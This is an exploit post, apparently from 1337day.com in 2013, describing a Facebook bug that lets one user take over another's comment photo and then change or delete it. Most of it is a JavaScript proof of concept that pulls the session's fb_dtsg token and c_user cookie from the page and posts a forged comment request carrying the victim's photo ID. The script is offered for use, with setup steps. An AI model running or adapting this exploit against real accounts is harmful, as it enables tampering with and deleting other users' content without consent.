Facebook Comment's Picture Hijacking

Today Facebook rollouts for FB users to comment with picture on any status. But the feature has a bug which allows malicious user to hijack the picture from any comments if the picture is share by uploading for comment. 

After Malicious user hijack the picture, malicious person can change picture description as well as delete the picture. 

Let's get started! all you need are status ID and victim's uploaded picture for comment ID. 



Once you have both, we can simply comment on any status with that uploaded picture iD with the help of little javascript or you can use tampa data (attached_photo_fbid) to post with comment picture ID.

-----Javascript Facebook Picture Hijack PoC----
 
var yourMessage = "check out my pic"; // your msg
var photofbID = XXXXXXXXXX; // victim photo ID
var statuslinkID = XXXXXXXXXX ; //status ID where to comment with hijack
 
function generatePhstamp(b, g) {
var f = b.length;
numeric_csrf_value = '';
for (var c = 0; c < g.length; c++) {
numeric_csrf_value += g.charCodeAt(c)
}
return '1' + numeric_csrf_value + f
}
var e = document.getElementsByName('fb_dtsg')[0].value,
c = document.cookie.split('c_user=')[1].split(';')[0],
h = "ft_ent_identifier="+statuslinkID+"&comment_text="+yourMessage +"&source=1&client_id=1371674471412:1000847939&attached_photo_fbid="+photofbID+"&rootid=u_ps_0_0_m&ft[tn]=[]&ft[qid]=5891294842807711448&ft[mf_story_key]:-2575904214724011317&ft[has_expanded_ufi]=1&nctr[_mod]=pagelet_home_stream&__user=" + c + "&__a=1&__dyn=7n8aD5z5CF-&__req=1r&fb_dtsg=" + e;
m = generatePhstamp(h, e);
h += "&phstamp=" + m;
picture = new XMLHttpRequest();
picture.open("POST", "https://www.facebook.com/ajax/ufi/add_comment.php", true);
picture.setRequestHeader("Content-type", "application/x-javascript; charset=utf-8");
picture.send(h);
console.log("The pic has been Hijacked & posted at http://facebook.com/"+statuslinkID);
 
# C21C8F0A214D3F86   1337day.com [2013-06-22]   69C7CC3775144A2C #

Follow: http://1337day.com/exploit/20915